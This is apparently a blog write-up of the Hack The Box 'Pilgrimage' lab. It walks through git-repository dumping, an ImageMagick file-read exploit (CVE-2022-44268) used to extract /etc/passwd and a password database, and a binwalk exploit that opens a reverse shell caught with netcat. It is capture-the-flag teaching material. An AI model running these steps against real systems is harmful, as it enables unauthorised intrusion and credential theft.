remoteshell.zip
Posts Tags Categories
remoteshell.zip

HTB: Pilgrimage

 included in  categories HTB CTF
     802 words   4 minutes 

Easy HTB machine where a website is used to reduce the size of images. Then an Image Magick exploit is used for file read vulnerability. Though that the SQLite3 database can be enumerated.

nmap shots port 22 and port 80 open.

$ nmap -sC -sV -oN nmap/default_ports -v 10.10.11.219 Nmap scan report for 10.10.11.219 Host is up (0.029s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA) | 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA) |_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519) 80/tcp open http nginx 1.18.0 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://pilgrimage.htb/ |_http-server-header: nginx/1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next to this scan that checks the default ports, I also run a port scan on all ports using -p- to make sure I don’t miss anything. The results from this were the same.

I add the following line in my /etc/hosts file 10.10.11.219 pilgrimage.htb

And the following website shows
Pasted image 20230917102050

I can register for an account
Pasted image 20230917102155

I can upload a file and shrink it, after which I receive a long URL to the shrunken file.
Pasted image 20230917102420

Pasted image 20230917102431

Let’s test if I can upload a malicious php reverse shell or web shell.
No luck after testing if I can upload a malicious php web shell.

I turn back and enumerate the box again, maybe I missed something. And yes, did I miss something, after the initial enumeration, i added pilgrimage.htb to my /etc/hosts file, but nmap couldn’t run other scripts against the domain. So i re-ran the nmap scan on port 80 and this time it also showed http-git

http-git: | 10.10.11.219:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...

Great, now I can use gitdump to see all the files.

$ python3 ~/github/GitDump/git-dump.py http://pilgrimage.htb/.git/ URL for test: http://pilgrimage.htb/.git/ Fetching: http://pilgrimage.htb/.git/index Fetching: http://pilgrimage.htb/.git/FETCH_HEAD Fetching: http://pilgrimage.htb/.git/HEAD Fetching: http://pilgrimage.htb/.git/ORIG_HEAD Fetching: http://pilgrimage.htb/.git/config Fetching: http://pilgrimage.htb/.git/description Fetching: http://pilgrimage.htb/.git/packed-refs Fetching: http://pilgrimage.htb/.git/info/exclude Fetching: http://pilgrimage.htb/.git/info/refs Fetching: http://pilgrimage.htb/.git/logs/HEAD Script Executed Successfully Run following command to retrieve source code: cd output && git checkout -- .

And I end up with all these files:
Pasted image 20230917105653

It uses ImageMagick to parse the files, it uses version 7.1.0-49
Pasted image 20230917105954

A quick google gets me to a github page with an exploit for CVE-2022-44268.

I first generate a malicous png file

$ python3 exploit.py -f "/etc/passwd" -o exploit.png [>] ImageMagick LFI PoC - by Sybil Scan Research [>] Generating Blank PNG [>] Blank PNG generated [>] Placing Payload to read /etc/passwd [>] PoC PNG generated > exploit.png

I then upload that file via the webinterface, so it gets compressed using imagemagick and then download the result again.
Pasted image 20230917111405

I then use the imagemagick from the git repository (the same that is being used on the live server) to identify the result

$ ./magick identify -verbose result.png

From there I copy the Raw profile type, and paste it in the following snipped

python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'

It then dumps all the /etc/passwd data! great, I could ofcourse read the users flag this way, but I want to do it via a shell session.

Now the question, what files do I want to read…
After I looked through the git files again, especially the register.php I noticed the following code snippet that shows where our username and passwords are being saved. Lets try to read this via the vulnerability.
Pasted image 20230917112617

After doing the same process as before, but now with /var/db/pilgrimage i ended up witha gigantic hex file that I somehow need to parse to sqlite.

I found the following stackoverflow question where it explains how I can transform the hex to binary again, so I can read it via sqlite.
xxd -r -p db_raw_oneline.hx db.bin

I now run this file via sqlite3 db.bin, since I am unfamiliar with the syntax, I checkout this quick and easy guide. And there we have a password for emily, as you might remember, emily was also in the /etc/passwd dump.

Pasted image 20230917114406

And I successfully login!
Pasted image 20230917114515

emily@pilgrimage:~$ cat user.txt 8a728138955c0718*************

Running ps aux shows a process malwarescan.sh that is not normal
Pasted image 20230917115521

Containing the following code
Pasted image 20230917115547

It uses binwalk in the code, I check the version in order to see if there is anything that can be exploited.
Pasted image 20230917115639

Google gave me the following exploit db post

Using the exploit, I had to put the generated file in /var/www/pilgrimage.htb/shrunk, since that is where the malwarescan.sh checks the files.

emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ python3 ~/.a/exploit.py ~/.a/cat.jpeg 10.10.14.52 5555

After that I listen via nc, and succesfully get a shell as root.

$ nc -lvnp 5555 listening on [any] 5555 ... connect to [10.10.14.52] from (UNKNOWN) [10.10.11.219] 43648 whoami root cd /root ls quarantine reset.sh root.txt cat root.txt 2d852eac9af3249d089**********
Updated on 03 Nov 2024
Read markdown
 HTBNmapImagemagickPilgrimageSqlite3Binwalk
 | Home